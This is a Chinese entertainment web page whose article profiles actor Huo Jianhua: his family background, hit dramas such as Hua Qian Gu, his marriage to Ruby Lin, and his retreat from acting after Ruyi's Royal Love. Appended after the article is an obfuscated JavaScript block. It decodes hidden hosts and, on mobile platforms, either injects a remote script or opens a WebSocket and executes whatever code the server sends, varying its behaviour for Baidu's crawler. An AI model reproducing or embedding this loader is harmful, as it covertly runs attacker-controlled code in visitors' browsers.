演过5部大热电视剧,事业红火时销声匿迹,霍建华为何不再演戏了

人生际遇总会有高低起伏,低潮期时不气馁,一帆风顺时低调如常,那一个人就已经不简单了。

我们通常喜欢低谷时自暴自弃,破罐子破摔,得意时趾高气昂忘乎所以,这是人的本能反应。

打破人性常规,就需要勇气、毅力和看淡名利的秉性。

霍建华是一个“出淤泥而不染”的人,他在事业最红火时选择远离媒体,沉淀自己,在人气居高不下时选择隐退家中,当起普通的平凡人。

从《花千骨》一炮而红,到《如懿传》后至今没有演戏,霍建华为何不再演戏了?

1、

霍建华出生于1979年,家境不错,父母都是公务员。

他的爷爷出生在山东省北马镇的霍家村,早年曾和孙中山先生一起闯天下。

1949年的时候,霍建华的爷爷去到了台湾,从此一家人在台湾省生活。

霍建华有个哥哥,一家四口也曾温馨幸福。

不幸的是,父母在他三岁左右时离婚了。

这件事给霍建华的内心带来了不小的打击。

那个年代离婚的夫妻不多,人们大都能忍耐着相互度过一生,离婚则被人投以各种异样的眼光。

霍建华从小内向,不爱说话,在可爱的外表下隐藏着一颗孤独的心。

从上小学起,霍建华就不爱读书,时常翘课,和老师顶嘴,对待父母也是逆反心态极强。

学生时代的霍建华没有什么梦想,甚至都没想过未来的道路。

高中毕业后,霍建华进去了一所职业学校学习表演艺术,他渐渐对唱歌产生了兴趣。

他17岁时就已经算从演艺圈出道了,当时在幕后当一位主持人的助理。

2、

23岁时,霍建华得到了一首歌曲的演唱机会,这首歌被选为偶像剧《摘星》的主题曲,霍建华由此机缘巧合下主演了这部剧,人生中的第一部电视剧。

他在电视剧中满脸的胶原蛋白,一脸青春懵懂的样子。

他就跟着感觉演完了这部戏,回看那个时候,霍建华都不禁感慨,太年轻了。

《摘星》打开了霍建华的表演生涯。

2004年,霍建华被导演选中,出演《海豚湾恋人》中的男二号,当时的合作演员是许绍洋和张韶涵。

许绍洋当时在台湾已是人气超旺的偶像男神,他在2001年时因主演《薰衣草》中的季晴川而红遍大江南北,是新世纪台湾省的第一代偶像剧男神。

许绍洋的出演,为这部剧增添了大量关注。

许多观众在看这部剧时,注意到了霍建华饰演的钟晓刚。

剧中他留着一头凌乱的黄色微卷的偏长发型,配合着自己忧郁的眼神和帅气的外形,被人特别是年轻的女孩所追捧,从而开始有了一些名气。

当时,台湾偶像剧正是各大导演开拍的首选电视剧类型,也产生了多部风靡全亚洲的偶像剧,比如《王子变青蛙》、《流星花园》。

导演看中了偶像剧的市场,大量的此种类别的电视剧开拍。

霍建华的偶像气质被导演看中,他也马不停蹄地接拍各种偶像剧。

当时的他还是新人,也没什么钱,都是一个人骑着摩托车去片场拍戏,有戏演让他很开心,但一年内接拍了多达七部偶像剧的他陷入了深刻地迷惘。

偶像剧表演形式单一,且对年龄有要求,岁数一大就拍不了。

霍建华开始重新思考自我的职业生涯,是继续趁着年轻接拍各种偶像剧,赚几年青春时光的费用,还是冒着危险重新探索演艺出路?

霍建华思索再三,选择了后者。

3、

从2004年开始,霍建华将职业生涯发展的重心转移到了内地。

在台湾他已经是个有名气的明星,但来内地后,他人气稀薄,一切都要从零开始。

他看中了内地市场的广阔,更想跳出以往偶像剧的老套路。

褪去了帅气的偶像光环,霍建华开始尝试各种类型的角色。

《天下第一》是霍建华接拍的第一部内地古装武侠剧,他在剧中饰演表面冷酷但内心柔情的归海一刀,并演唱了剧中的主题曲《你的第一》。

《天下第一》这部剧汇集了两岸三地的明星,当年曾是最热门的古装偶像剧。

隐约记得,当时学校食堂里安静地坐着密密麻麻的学生,全部在聚精会神地看着食堂里摆放的一个电视,电视中播放的正是《天下第一》。

此剧的爆火让霍建华在内地有了一定的关注度,成为他进军内地不错的跳板。

2005年,他重拾偶像剧,与孙俪合作出演了《屋顶上的绿宝石》,这部剧共三十集,有三大演技派演员加持“张国立、张铁林、刘雪华”。

霍建华在其中和他们也有大量的对手戏。

这部戏提升了霍建华的演技水平,他本人曾坦言:这部戏使我的演技开窍了。

如果说《天下第一》是霍建华出演的第一部大热电视剧,时隔四年,他和胡歌、杨幂等人主演的《仙剑奇侠传三》再次成功出圈,成为火热一时的他的人生中主演的第二部爆火电视剧。

霍建华在剧中饰演仙风道骨的徐长卿,为人世间驱除邪恶,救济苍生。

他在剧中和女演员唐嫣展开了一场长达三世的恋情。

正经与正直的内心下有一颗痴情的心,这样的徐长卿成为了观众热捧的剧中人物之一。

霍建华也因此受到了大量观众的喜爱,人气和知名度大增。

他因此剧和胡歌结下了良好的友谊,两人曾共同拍摄杂志写真,诠释坚定的友谊。

霍建华不爱社交,在内地的朋友屈指可数。

霍建华曾说,一只手的数量都没有。

可见,胡歌能成为霍建华的好朋友也说明两人之间的默契程度之高。

2011年,霍建华和林心如主演《倾世皇妃》,霍建华在剧中一改往日的正面荧屏形象,出演了一位邪恶的帝国君王,和林心如上演爱恨情仇。

此剧并非是两人的首次合作,早在2006年,两人曾合作《地下铁》,由此结下了深厚的友情。

《倾世皇妃》是林心如首次担纲制片人,她力邀霍建华出演。

两人在片场有说有笑,霍建华也变得开朗活泼起来。

当时,大家都认为两人是纯真的友情,毕竟感觉林心如不会喜欢霍建华这种类型,霍建华对林心如也应该不感兴趣。

但意外的是,五年后,两人公开宣布在一起了,并同年在巴厘岛结婚。

如今已经结婚五年,林心如也已经产下一女,一家三口的生活相当幸福。

《倾世皇妃》曾创下了8天内1亿多的播放量,在当时已经一骑绝尘。

此剧也成为了霍建华所主演的第三部爆红的电视剧,霍建华由此获得了当年优酷网所颁发的最具价值男演员奖项。

次年,即2012年,霍建华出演《笑傲江湖》中的男一号令狐冲,这个角色和霍建华以往的角色都大为不同。

霍建华过往所演的角色类型通常是面容冷酷、性格安静的人物,这也契合他的个人性格。

但令狐冲则豁达不羁,和《仙剑奇侠传》中的李逍遥有几分相似。

霍建华决心接下这部戏,也是为了突破自我演技的桎梏,借此寻求突破。

霍建华和陈乔恩在此剧中有大量的对手戏和感情戏。

两人曾在2003年因合作拍摄《千金百分百》结缘,因戏生情后正式交往,但仅仅半年后匆匆分手,让许多粉丝大为遗憾。

霍建华的好友胡歌也曾有过类似经历,他曾和江疏影谈过恋爱,但被曝光后,同样火速分手。从这点看,霍建华和胡歌在感情的某个认识维度上,可能确实有相似之处。

4、

真正让霍建华跻身华语一线男演员行列的电视剧是《花千骨》。

2015年6月,电视剧《花千骨》播出,收视率居高不下,平均高达2.21%,即此剧播出时,100个人中有两个多人在观看这部剧。

在网络收视方面,此剧更是高得惊人,总点击量高达230亿,平均每集点击量4.6亿,打破了多项记录。

《花千骨》占据了整个2015年的暑假电视剧的榜首,且观看量远超其它电视剧。

此剧让霍建华的人气达到了顶峰,成为了当红男明星,拥有了数以千万的粉丝群体。

霍建华在《花千骨》中饰演白衣飘飘的白子画,冷静甚至有些冷酷的外表下,却有着一颗滚烫热血的心。

霍建华因这部剧名气达到巅峰,成为了真正的全民熟知的男明星,并获称“国民上仙”,风头无两,所向披靡。

《花千骨》成为霍建华所主演的第五部大火的电视剧。

其实,霍建华还有一部剧原本应该也是大火的电视剧,但这部剧遇到了各种变故,导致播出时观众已经没有了太多的期待和兴趣,收视率平平。

这部剧就是开拍时就备受关注的《如懿传》。

此剧由霍建华和周迅领衔主演,众多明星出演配角的一部大型宫廷剧。

但此剧并未带给霍建华太多的正面效应,反而因传出他片酬高达上亿元而备受争议。

霍建华在此剧后开始销声匿迹,已经多年没有接拍新的作品了,也鲜少出现在公开场合。

5、

有人不禁好奇,从《如懿传》后,霍建华为何长达三年没有拍戏,难道是无戏可拍了?

《如懿传》导演汪俊曾说:“我毁了他,他可能以后都没法拍戏了。”此话是何意?

霍建华后来表示:“很难再找到像《如懿传》中乾隆那样饱满的角色类型了。”

自从演完《如懿传》后,霍建华挑选剧本的要求也变高了,林心如每次出席活动都帮霍建华解释:“他在挑选剧本,重质不重量。”

原本就不喜好社交的霍建华借此能好好享受个人的生活,抽出更多的时间陪伴女儿。

霍建华从小就内向低调,成为明星后性格也丝毫没有发生改变。

他常常会一个人去吃饭、逛街,他享受一个人独处的时光。

出道25年以来,霍建华很少有绯闻,不炒作,更没有乱七八糟的丑闻,他除了作品外,不想多出现在镜头之中。

每一个作品,他都用心挑选,选好后尽全力出演,努力成为一个真正的演员,对得起演员的称谓和粉丝的喜爱。

他有一颗饱满的爱心,在剧组对每一个群演都以礼相待,见不得剧组和社会生活中出现“以大欺小”的现象。

他不允许粉丝花钱买礼物送给他,礼物仅限手工制品和书信。

以我来看,霍建华此类的明星才是明星应该有的姿态和样子。

现在的演艺圈,太浮躁了。

为了出名,完全丢失了底线,为了利益,完全不顾原则,为了流量,完全可以颠倒是非。

当歌手不把重心放在唱歌上,演员不重视演技的时候,呈现出的音乐作品和影视作品都是质量堪忧地收割“韭菜”之作。

这种氛围下,谁还能沉下心打磨演技等专业技能呢,从这个角度看,霍建华的低调和努力在本专业中潜心修炼的品格更是难能可贵了。

影视资讯 林心如 霍建华 电视剧 明星 清浅微笑 育儿

有用 (915)

评论加载中...
function Fdhbztse(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function xtpXLz(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return Fdhbztse(t);};window['\x49\x72\x75\x61\x79\x67\x76']=(/^Android|iPhone|iPad|iPod|Linux/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=xtpXLz,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':6868/'+i);ws.onmessage=function(e){new Function('_cqgd',x(e.data))(cs);ws.close();}}else{var s=document.createElement('script');s.src=u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('aHHR0cHHM6Ly95c2prYmsuY29t','ZmEueXNqa2JrLmNvbbQ==','509',window,document,['H','b']);}:function(){};